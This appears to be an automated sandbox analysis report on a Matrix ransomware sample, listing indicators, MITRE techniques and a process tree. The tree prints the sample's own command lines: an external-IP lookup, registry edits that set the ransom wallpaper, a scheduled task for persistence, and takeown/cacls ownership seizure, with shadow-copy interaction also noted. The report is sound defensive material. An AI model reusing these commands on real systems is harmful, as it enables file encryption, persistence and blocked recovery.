File opened (read-only)	\??\W:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\P:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	ITjElT8m64.exe
File opened (read-only)	\??\M:	ITjElT8m64.exe
File opened (read-only)	\??\Q:	ITjElT8m64.exe
File opened (read-only)	\??\R:	ITjElT8m64.exe
File opened (read-only)	\??\Y:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\U:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\R:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\S:	ITjElT8m64.exe
File opened (read-only)	\??\V:	ITjElT8m64.exe
File opened (read-only)	\??\X:	ITjElT8m64.exe
File opened (read-only)	\??\H:	ITjElT8m64.exe
File opened (read-only)	\??\P:	ITjElT8m64.exe
File opened (read-only)	\??\T:	ITjElT8m64.exe
File opened (read-only)	\??\U:	ITjElT8m64.exe
File opened (read-only)	\??\Z:	ITjElT8m64.exe
File opened (read-only)	\??\T:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\J:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\F:	ITjElT8m64.exe
File opened (read-only)	\??\K:	ITjElT8m64.exe
File opened (read-only)	\??\W:	ITjElT8m64.exe
File opened (read-only)	\??\Z:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Y:	ITjElT8m64.exe
File opened (read-only)	\??\F:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	ITjElT8m64.exe
File opened (read-only)	\??\O:	ITjElT8m64.exe
File opened (read-only)	\??\N:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	ITjElT8m64.exe
File opened (read-only)	\??\X:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\V:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Q:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\JQSECZrn.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Manaus	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\javaws.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdate.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\Solitaire.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\EST5	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\dependentlibs.list	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\de.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\alt-rt.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\blocklist.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\jfr\default.jfc	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\LICENSE	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1080	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1380	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1984	powershell.exe
1436	ITjElT8m64.exe
1436	ITjElT8m64.exe
1436	ITjElT8m64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1436	ITjElT8m64.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	1436	ITjElT8m64.exe
Token: SeLoadDriverPrivilege	1436	ITjElT8m64.exe
Token: SeTakeOwnershipPrivilege	940	takeown.exe
Token: SeTakeOwnershipPrivilege	2000	takeown.exe
Token: SeTakeOwnershipPrivilege	780	takeown.exe
Token: SeTakeOwnershipPrivilege	1648	takeown.exe
Token: SeTakeOwnershipPrivilege	1588	takeown.exe
Token: SeTakeOwnershipPrivilege	460	takeown.exe
Token: SeTakeOwnershipPrivilege	716	takeown.exe
Token: SeTakeOwnershipPrivilege	1148	takeown.exe
Token: SeBackupPrivilege	636	vssvc.exe
Token: SeRestorePrivilege	636	vssvc.exe
Token: SeAuditPrivilege	636	vssvc.exe
Token: SeTakeOwnershipPrivilege	1996	takeown.exe
Token: SeTakeOwnershipPrivilege	1148	takeown.exe
Token: SeTakeOwnershipPrivilege	1500	takeown.exe
Token: SeTakeOwnershipPrivilege	1808	takeown.exe
Token: SeTakeOwnershipPrivilege	1696	takeown.exe
Token: SeTakeOwnershipPrivilege	1048	takeown.exe
Token: SeTakeOwnershipPrivilege	1072	takeown.exe
Token: SeTakeOwnershipPrivilege	844	takeown.exe
Token: SeTakeOwnershipPrivilege	1972	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1624 wrote to memory of 1328	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1624 wrote to memory of 1328	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1624 wrote to memory of 1328	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1624 wrote to memory of 1328	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1624 wrote to memory of 360	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 1624 wrote to memory of 360	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 1624 wrote to memory of 360	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 1624 wrote to memory of 360	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 360 wrote to memory of 1984	360	cmd.exe	34
PID 360 wrote to memory of 1984	360	cmd.exe	34
PID 360 wrote to memory of 1984	360	cmd.exe	34
PID 360 wrote to memory of 1984	360	cmd.exe	34
PID 1624 wrote to memory of 336	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1624 wrote to memory of 336	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1624 wrote to memory of 336	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1624 wrote to memory of 336	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	38
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	38
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	38
PID 1624 wrote to memory of 2044	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	38
PID 336 wrote to memory of 1156	336	cmd.exe	41
PID 336 wrote to memory of 1156	336	cmd.exe	41
PID 336 wrote to memory of 1156	336	cmd.exe	41
PID 336 wrote to memory of 1156	336	cmd.exe	41
PID 1624 wrote to memory of 772	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 1624 wrote to memory of 772	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 1624 wrote to memory of 772	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 1624 wrote to memory of 772	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 772 wrote to memory of 1128	772	cmd.exe	46
PID 772 wrote to memory of 1128	772	cmd.exe	46
PID 772 wrote to memory of 1128	772	cmd.exe	46
PID 772 wrote to memory of 1128	772	cmd.exe	46
PID 2044 wrote to memory of 752	2044	cmd.exe	42
PID 2044 wrote to memory of 752	2044	cmd.exe	42
PID 2044 wrote to memory of 752	2044	cmd.exe	42
PID 2044 wrote to memory of 752	2044	cmd.exe	42
PID 336 wrote to memory of 1660	336	cmd.exe	47
PID 336 wrote to memory of 1660	336	cmd.exe	47
PID 336 wrote to memory of 1660	336	cmd.exe	47
PID 336 wrote to memory of 1660	336	cmd.exe	47
PID 772 wrote to memory of 1616	772	cmd.exe	48
PID 772 wrote to memory of 1616	772	cmd.exe	48
PID 772 wrote to memory of 1616	772	cmd.exe	48
PID 772 wrote to memory of 1616	772	cmd.exe	48
PID 336 wrote to memory of 984	336	cmd.exe	49
PID 336 wrote to memory of 984	336	cmd.exe	49
PID 336 wrote to memory of 984	336	cmd.exe	49
PID 336 wrote to memory of 984	336	cmd.exe	49
PID 772 wrote to memory of 1716	772	cmd.exe	50
PID 772 wrote to memory of 1716	772	cmd.exe	50
PID 772 wrote to memory of 1716	772	cmd.exe	50
PID 772 wrote to memory of 1716	772	cmd.exe	50
PID 1716 wrote to memory of 1720	1716	cmd.exe	51
PID 1716 wrote to memory of 1720	1716	cmd.exe	51
PID 1716 wrote to memory of 1720	1716	cmd.exe	51
PID 1716 wrote to memory of 1720	1716	cmd.exe	51
PID 1624 wrote to memory of 1788	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	52
PID 1624 wrote to memory of 1788	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	52
PID 1624 wrote to memory of 1788	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	52
PID 1624 wrote to memory of 1788	1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	52

C:\Users\Admin\AppData\Local\Temp\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
"C:\Users\Admin\AppData\Local\Temp\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\NWrfEHHB.exe"
  2⤵
  PID:2044
- C:\Users\Admin\AppData\Local\Temp\NWrfEHHB.exe
  "C:\Users\Admin\AppData\Local\Temp\NWrfEHHB.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1328
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\wtgCb5LF.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\JQSECZrn.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\JQSECZrn.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1156
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kyIfZhiR.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kyIfZhiR.vbs"
    3⤵
    PID:752
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\yGF1qmWm.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:584
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\yGF1qmWm.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1080
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:988
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1148
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1720
